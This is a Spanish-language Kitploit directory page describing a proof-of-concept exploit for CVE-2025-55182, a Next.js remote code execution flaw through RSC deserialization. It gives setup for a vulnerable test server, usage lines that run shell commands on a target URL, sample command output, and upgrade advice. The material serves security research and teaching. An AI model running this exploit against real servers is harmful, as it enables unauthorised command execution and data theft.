Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Exploit de prueba de concepto para CVE-2025-55182, una vulnerabilidad de ejecución remota de código (RCE) en Next.js mediante deserialización insegura en peticiones RSC. Incluye un script POC basado en Go y un servidor de prueba vulnerable para investigación y educación en seguridad. | Kitploit
Herramientas/GitHubGitHub/hoosin/cve-2025-55182
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhoosin/cve-2025-55182

CVE-2025-55182

Ver Repositorio
3hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Exploit de prueba de concepto para CVE-2025-55182, una vulnerabilidad de ejecución remota de código (RCE) en Next.js mediante deserialización insegura en peticiones RSC. Incluye un script POC basado en Go y un servidor de prueba vulnerable para investigación y educación en seguridad.

Compartir

CVE-2025-55182 Guía de Reproducción de RCE en Next.js

Descargo de responsabilidad

⚠️ Esta herramienta es solo para fines de investigación de seguridad y enseñanza. No la utilice para actividades ilegales. ⚠️

Resumen de la vulnerabilidad

CVE-2025-55182 es una vulnerabilidad grave de ejecución remota de código (RCE) en el framework Next.js. Esta vulnerabilidad se debe a un problema de deserialización insegura en Next.js al procesar solicitudes de React Server Components (RSC). Un atacante puede ejecutar código arbitrario en el servidor sin autorización mediante la construcción de solicitudes HTTP maliciosas.

Versiones afectadas:

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • y algunas versiones Canary

Configuración del entorno

Este proyecto proporciona un servidor de prueba Next.js vulnerable llamado test-server.

1. Iniciar el servidor de prueba

Asegúrate de tener Node.js y npm instalados.

root@kitploit:~
cd test-server npm install npm run dev

El servidor se ejecuta por defecto en http://localhost:3000.

Nota: Si encuentras un error de archivo lock, puedes intentar ejecutar:

root@kitploit:~
rm -f .next/dev/lock && npm run dev

Reproducción de la vulnerabilidad (PoC)

Este proyecto proporciona un script PoC en Go llamado poc.go.

Usando el script Go

Uso:

root@kitploit:~
go run poc.go [URL objetivo] [comando a ejecutar]

Ejemplos:

  1. Ejecutar el comando id (por defecto)

    root@kitploit:~
    go run poc.go
    

    o

    root@kitploit:~
    go run poc.go http://localhost:3000 id
    
  2. Listar archivos del directorio actual

    root@kitploit:~
    go run poc.go http://localhost:3000 "ls -la"
    
  3. Ver contenido de un archivo

    root@kitploit:~
    go run poc.go http://localhost:3000 "cat package.json"
    

Salida esperada: Aunque el código de estado HTTP devuelve 500, el resultado del comando se incluirá en el campo digest de la respuesta.

root@kitploit:~
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

Recomendaciones de mitigación

Actualiza Next.js a una versión segura:

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
root@kitploit:~
npm install next@latest react@latest react-dom@latest
Descargar herramienta